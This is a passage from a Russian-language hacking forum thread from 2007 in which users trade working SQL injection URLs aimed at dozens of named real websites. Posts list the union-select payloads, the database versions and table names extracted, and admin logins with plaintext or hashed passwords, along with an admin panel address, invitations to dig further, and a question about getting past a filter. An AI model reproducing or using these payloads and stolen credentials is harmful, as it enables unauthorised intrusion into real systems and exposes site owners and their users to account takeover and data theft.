SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    www.kochfeuer.de
    Softbiz Link Directory Script
     
    #3681 kair, 13 Nov 2007
    Last edited: 13 Nov 2007
  2. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,admin,6,nick,icq,9+from+algi_users/*
    HTML:
    http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,5,6,nick,icq,9+from+poezje_users/*
    БД 5
     
  3. FoxMALDER

    FoxMALDER Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    43
    Likes Received:
    20
    Reputations:
    -1
    dinaitour.com - туризм в Украине
    4.1.20dinaitourdinaitour@localhost
    Code:
    http://www.dinaitour.com/tourism/tour/ukraine/?tour=3&sub=-1+union+select+1,concat_ws(0x05,version(),database(),user()),3,4/*
     
  4. FoxMALDER

    FoxMALDER Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    43
    Likes Received:
    20
    Reputations:
    -1
    nadejda.com.ua - агенство недвижимости
    5.0.45-lognadejda_nadejdanadejda_unadejda@localhost
    Code:
    http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
    http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.columns/*
    cities
    constypes
    flattypes
    main
    maps
    objects
    typetypes
     
    1 person likes this.
  5. FoxMALDER

    FoxMALDER Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    43
    Likes Received:
    20
    Reputations:
    -1
    pizzamarketplace.com - Pizza Marketplace
    4.0.27-standardsitedbatmmarketplace@localhost
    Code:
    http://www.pizzamarketplace.com/research.php?rc_id=-1+union+select+concat_ws(0x05,version(),database(),user()),2,3,4,5,6,7,8,9/*
    Проголодались? :D
     
    1 person likes this.
  6. FoxMALDER

    FoxMALDER Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    43
    Likes Received:
    20
    Reputations:
    -1
    Серия сайтов сделаных студией Granite5

    Серия сайтов сделаных студией Granite5

    4.1.10a-standard-logcenturycareadmin@localhost
    Code:
    http://www.21centurycare.co.uk/vacancydetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4/*
    4.1.10a-standard-logallNationsCollegeadmin@localhost
    Code:
    http://www.allnations.ac.uk/newsevent.php?newseventid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*&section=Home
    4.1.10a-standard-logblueoceanadmin@localhost
    Code:
    http://www.blueoceanpublishing.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
    4.1.10a-standard-logbmladmin@localhost
    Code:
    http://www.bmlbss.com/news_article.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4,5,6/*
    4.1.10a-standard-logbournadmin@localhost
    Code:
    http://www.bournschool.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    4.1.10a-standard-logdruidsadmin@localhost
    Code:
    http://www.boxtreebar.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    4.1.10a-standard-logbremedadmin@localhost
    Code:
    http://www.bremed.co.uk/shop.php?shopcatid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),5,6,7,8,9,10,11,12,13,14,15,16/*
    4.1.10a-standard-logbullyingmattersadmin@localhost
    Code:
    http://www.bullyingmatters.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
    4.1.10a-standard-logbosadmin@localhost
    Code:
    http://www.businessofficesupplies.co.uk/news_story.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2/*
    4.1.10a-standard-logcambridgeblueadmin@localhost
    Code:
    http://www.cambridgeblue.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
    4.1.10a-standard-loggeniusTemplateadmin@localhost
    Code:
    http://www.caro.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    4.1.10a-standard-logfelthamsadmin@localhost
    Code:
    http://www.cplfelthams.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    4.1.10a-standard-logchairs4childrenadmin@localhost
    Code:
    http://www.chairs4children.com/article.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),3,4,5,6,7,8/*
    4.1.10a-standard-loggeniusTemplateadmin@localhost
    Code:
    http://www.cliffordburr.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    4.1.10a-standard-loggeniusTemplateadmin@localhost
    Code:
    http://www.country-toys.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    4.1.10a-standard-logcranfieldeg2admin@localhost
    Code:
    http://www.cranfieldelectrical.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
    4.1.10a-standard-loggeniusTemplateadmin@localhost
    Code:
    http://www.crownhillgarden.com/index.php?pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    4.1.10a-standard-logcrowoodadmin@localhost
    Code:
    http://www.crowood.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    4.1.10a-standard-loggeniusTemplateadmin@localhost
    Code:
    http://www.crtsolutions.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
    4.1.10a-standard-logwichitaadmin@localhost
    Code:
    http://www.wichita.co.uk/productdetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4/*
    Cambridge University Rugby Club
    4.1.10a-standard-logcurufcadmin@localhost
    Code:
    http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    P.S.: Кстати, это далеко не полный список сайтов... Почти половина! :D
     
    #3686 FoxMALDER, 14 Nov 2007
    Last edited: 14 Nov 2007
    4 people like this.
  7. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),user(),database()),2,3,4,5,6,7/*
    4.0.26/[email protected]/colorprintru
     
  8. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.greenshift.com/news.php?id=-97+UNION+SELECT+1,user,password,4,5,6,7,8,9,10,11,12+from+mysql.user/*
     
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    А вот еще одни нубы )) надо ж так у админа пасс 1234 был :
    http://www.apollo-tour.ru/

    [​IMG]

    admin:1234
    админка как обычно : http://www.apollo-tour.ru/admin/index.php
     
    1 person likes this.
  10. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Прошу прощения за рекламу =\ сразу неподумал
     
  11. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://michaelyoun.com/index.php?id=335+union+select+1,concat(login,0x7c,pass),3,4,5,concat_ws(0x2F,version(),user(),database())+from+users+limit+3,3//*
    Version : 4.0.17-standard/[email protected]/michael132576

    login | Password

    Julien | $hAiaSOWw$L.ElrCaZddSXNbczXLln..

    neel | $NT1HKLs6$maKjAm5gOFUdNwVnPKDed0

    david | $CkfkJS1m$R0Wm0U9U.SewH1gZPqYOS.

    marcoa | $zRtxrrzF$x9QdtdsEoDw47todoerT30

    DavidHill | $/jrBGNbU$lneMqAV.Nwsk8bYXxsqLb.

    Pascal | $tUYKyzOrNMdHIM2AsIYpf9ZnvgYc0

    francoisadmin | $GaZJk4Aq$lGLp3Qc7ah45PioM9Mknl/

    aroustan | $WXSFA3Ry$H2sDLkEXsCKHpXYIO9hnV/

    jcharron | {left}NGNegUI$o4Uub83kCAKzLHetW7UBp.

    roussot | $K1e9J0lz$A8trNdKNnQQwyrsNIJy7N.
     
    #3691 K1nD[e]R, 14 Nov 2007
    Last edited: 14 Nov 2007
  12. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    Так удали...тут скрины не надо выставлять...если каждый будет скрин кидать хрен пойми что получится.


    HTML:
    http://www.thaitrademe.com/classifieds/product_desc.php?id=-4871+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
    БД 5

    HTML:
    http://www.classifiedbiz.com/product_desc.php?id=4635+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    4 бд

    HTML:
    http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(admin_name,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_admin/*
    HTML:
    http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(username,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_members/*
    БД 5
     
    #3692 KEHT33, 14 Nov 2007
    Last edited: 14 Nov 2007
  13. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://ukrfoto.dp.ua/download.php?id=-166+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6/*
    ukrfoto@saturn/4.1.22-log/ukrfoto 3
     
  14. -MoLoToK-

    -MoLoToK- Elder - Старейшина

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Code:
    http://www.heroesworld.ru/files.php?section=9999999'+union+select+1,concat_ws(0x2F,user(),version()%20%20,database())/*
    heroesv_bdu@localhost/4.1.20/heroesv_main
    Работает только с 9999999.
     
    #3694 -MoLoToK-, 14 Nov 2007
    Last edited: 14 Nov 2007
  15. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Агентство недвижимости «ИНСАЙД НОРД ВЕСТ»

    Code:
    http://www.i-nw.ru/news.php?id=9999+union+select+1,version(),3,4,concat(login,char(58),password),6,7+from+users/*
    Version 4.1.20-log/[email protected]/db_insidenw_1

    Admins

    secretar:123
    luoman:12345
    fin:f2inw
     
    2 people like this.
  16. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.roguegovernment.com/news.php?id=-4682+union+select+1,version(),aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x3a),0x3a),4,5,6+from+mysql.user/*
    Version root@localhost/4.1.7/roguegovernment

    Admins:

    root:6aee13f5467031e6
     
  17. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.pro-tour.ru/news.php?id=772+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6,7/*
    protour@19
    ----------------------------------------------------------------------------------------------------------

    Code:
    http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(0x2F,version(),user(),database()),5,6/*
    4.1.20-lk-log/clarionrus@localhost/clarionrus
     
    #3697 K1nD[e]R, 14 Nov 2007
    Last edited: 14 Nov 2007
  18. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    triennale.it
    Code:
    http://www.triennale.it/index.php?lang=_eng&id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,version(),database(),user()),43,44,45,46,47,48,49,50/*
    55 таблиц:
    Code:
    http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name,43,44,45,46,47,48,49,50+from+information_schema.tables+limit+54,1/*
    Насколько я понял, таблица админов - utenti_gestionale:
    Code:
    http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,id_utente,password),43,44,45,46,47,48,49,50+from+utenti_gestionale+limit+0,1/*
    Её поля:
    Code:
    id_utente
    password
    grado
    Админов трое "логин:пасс":
    Code:
    triennale:Triennale_6
    biglietteria:TrMilano
    biglietteriaTBVS:TBVS_
    На сайте есть SHOP, кому интересно - ковыряйте дальше (я с итальянским как-то не дружу!).
     
  19. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.getsalt.com/news.php?id=-117+union+select+1,2,concat_ws(0x2F,version(),user(),database()),4,5,6,concat_ws(char(58,58),username,password,id),8,9,10,11,12+from+fb_users+limit+3,3/*
    Данные : 5.0.22-log/getsalt@localhost/getsalt

    Admins:
    Login Password ID

    Anneleen test123 2
    kikivreeling vre27kik 19
     
  20. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Вопрос!
    Сайт atdr.ro :
    Code:
    http://atdr.ro/index.php?id=-1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11/*
    Фильтрацию "+" обошёл, а вот concat никак не могу :mad:
    Как обойти?
    И ещё: при подборе таблиц странная реакция на запрос поля user_password из mysql.user
    Кто копнёт глубже - отпишитесь (+)!
     
Thread Status:
Not open for further replies.